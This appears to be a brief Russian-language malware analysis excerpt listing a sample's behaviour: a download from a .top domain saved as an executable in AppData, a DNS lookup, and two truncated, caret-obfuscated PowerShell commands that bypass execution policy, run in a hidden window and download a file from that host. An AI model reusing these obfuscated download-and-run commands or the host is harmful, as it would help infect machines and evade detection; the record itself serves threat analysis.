Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwersHELl.^EXe^ -^ExE^CU^t^I^on^POl^IcY^ ^bY^pAS^s ^-no^PrOfiL^E -^wi^n^d^O^wSTYLE HiDDeN (neW-o^BJEcT sysTeM.^n^E^T.^WeBC^L^iE^NT).D^oWNL^oADf^i^le('http://newfooda...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /c "POwersHELl.^EXe^ -^ExE^CU^t^I^on^POl^IcY^ ^bY^pAS^s ^-no^PrOfiL^E -^wi^n^d^O^wSTYLE HiDDeN (neW-o^BJEcT sysTeM.^n^E^T.^WeBC^L^iE^NT).D^oWNL^oADf^i^le('http://newfooda...' (со скрытым окном)